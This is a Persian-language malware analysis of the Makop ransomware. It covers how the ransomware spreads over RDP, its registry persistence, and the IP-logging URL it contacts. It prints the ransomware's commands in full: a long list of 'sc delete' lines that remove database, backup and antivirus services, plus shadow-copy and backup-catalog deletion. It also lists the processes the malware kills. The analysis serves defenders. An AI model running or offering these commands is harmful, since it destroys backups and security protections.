نخستین نسخه باجافزار Makop در اواخر سال ۱۳۹۸ شناسایی شد. برخی شرکتهای امنیتی Makop را نسخهای از خانواده باجافزار معروف Phobos میدانند.
Makop بهمنظور رمزگذاری از الگوریتم Advanced Encryption Standard – به اختصار AES – بهره میگیرد.
اتصال از راه دور مهاجمان از طریق پودمان Remote Desktop Protocol – به اختصار RDP – به دستگاههای با رمز عبور ضعیف یا هک شده و اجرای فایل مخرب باجافزار، اصلیترین روش انتشار Makop است. هر چند که انتشار نمونههایی از Makop نیز از طریق هرزنامههای ناقل فایل / لینک مخرب، فایل مخرب موسوم به Downloader یا با(Exploiting) از آسیبپذیریهای امنیتی گزارش شده است.
Makop برای ماندگاری طولانیتر، اقدام به ایجاد کلید زیر در (Registry) سیستم عامل میکند:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run ۱ = {Malware File Path}\{Malware Filename}.exe
این باجافزار از طریق توابع WNetOpenEnumW و WNetEnumResourceW اقدام به شناسایی منابع و ارتباطات شبکهای میکند. همچنین از GetLogicalDrives و GetDriveTypeW بهترتیب بهمنظور یافتن درایوها و نوع آنها بهره گرفته میشود. Makop فایلهای ذخیره شده در پوشههای اشتراکی و حافظههای جداشدنی متصل به دستگاه را هدف قرار میدهد.
باجافزار با برقراری ارتباط با نشانی زیر از طریق توابع InternetOpenA، InternetConnectA، HttpOpenRequestA و HttpSendRequestA اقدام به استخراج نشانی IP دستگاه قربانی میکند:
hxxps[:]//iplogger.org/۱Bzcq۷
Makop با اجرای فرامین زیر نسبت به از کاراندازی برخی سرویسها اقدام میکند:
sc delete vmickvpexchange
sc delete vmicguestinterface
sc delete vmicshutdown
sc delete vmicheartbeat
sc delete vmicrdv
sc delete storflt
sc delete vmictimesync
sc delete vmicvss
sc delete MSSQLFDLauncher
sc delete MSSQLSERVER
sc delete SQL SERVERAGENT
sc delete SQLBrowser
sc delete SQLTELEMETRY
sc delete MsDtsServer۱۳۰
sc delete SSISTELEMETRY۱۳۰
sc delete SQLWriter
sc delete “MSSQL$VEEAMSQL۲۰۱۲”
sc delete “SQLAgent$VEEAMSQL۲۰۱۲”
sc delete MSSQL
sc delete SQLAgent
sc delete MSSQLServerADHelper۱۰۰
sc delete MSSQLServerOLAPService
sc delete MsDtsServer۱۰۰
sc delete ReportServer
sc delete “SQLTELEMETRY$HL”
sc delete TMBMServer
sc delete “MSSQL$PROGID”
sc delete “MSSQL $WOLTERSKLUWER”
sc delete “SQLAgent$PROGID”
sc delete “SQLAgent$WOLTERSKLUWER”
sc delete “MSSQLFDLauncher$OPTIMA”
sc delete “MSS QL$OPTIMA”
sc delete “SQLAgent$OPTIMA”
sc delete “ReportServer$OPTIMA”
sc delete “msftesql$SQLEXPRESS”
sc delete “postgresql-x۶۴-۹,۴”
sc delete WRSVC
sc delete ekrn
sc delete klim۶
sc delete “AVP۱۸,۰.۰”
sc delete KLIF
sc delete klpd
sc delete klflt
sc delete klbackupdisk
sc delete klbackupflt
sc delete klkbdflt
sc delete klmouflt
sc delete klhk
sc delete “KSDE۱,۰.۰”
sc delete kltap
sc delete TmFilter
sc delete TMLWCSService
sc delete tmusa
sc delete TmPreFilter
sc delete TMSmartRelayService
sc delete TMiCRC ScanService
sc delete VSApiNt
sc delete TmCCSF
sc delete tmlisten
sc delete TmProxy
sc delete ntrtscan
sc delete ofcservice
vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
پیش از آغاز رمزگذاری، باجافزار، پروسههای زیر را متوقف میکند:
msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsrvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng۵۰.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat۶۴.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe
هدف از انجام این کار فراهم شدن امکان رمزگذاری فایلهای مورد استفاده این پروسههاست.
اطلاعیه باجگیری (Ransom Note) با نام readme-warning.txt نیز در هر یک از پوشههای هدف قرار گرفته شده کپی میشود:
Makop به فایل های رمزگذاری شده پسوندی با الگوی زیر الصاق میکند:
.[۸ Random Characters].[Attacker’s email].makop
با رعایت موارد زیر میتوان سازمان را از گزند حملات باجافزاری هدفمند ایمن نگاه داشت:
منبع;
دیدگاه شما